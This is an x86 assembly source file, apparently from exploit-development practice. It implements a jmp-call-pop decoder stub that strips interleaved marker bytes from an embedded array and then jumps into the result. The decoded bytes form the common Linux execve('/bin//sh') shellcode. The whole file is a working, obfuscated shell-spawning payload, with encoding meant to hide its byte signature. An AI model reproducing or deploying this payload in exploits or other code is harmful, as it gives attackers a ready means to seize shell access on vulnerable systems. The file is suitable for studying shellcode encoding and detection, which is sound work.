global _start			

section .text
_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx
	xor ecx,ecx
	mov cl,0x1

decode: 
	mov bl, byte [esi + eax]
	xor bl, cl
	jnz short shellcode
	mov bl, byte [esi + eax + 1]
	mov byte [edi], bl
	inc edi
	inc cl
	add al, 2
	jmp short decode


call_shellcode:

	call decoder
	shellcode:db 0x31,0x01,0xc0,0x02,0x50,0x03,0x68,0x04,0x2f,0x05,0x2f,0x06,0x73,0x07,0x68,0x08,0x68,0x09,0x2f,0x0a,0x62,0x0b,0x69,0x0c,0x6e,0x0d,0x89,0x0e,0xe3,0x0f,0x50,0x10,0x89,0x11,0xe2,0x12,0x53,0x13,0x89,0x14,0xe1,0x15,0xb0,0x16,0x0b,0x17,0xcd,0x18,0x80,0x19, 0xbb, 0xbb
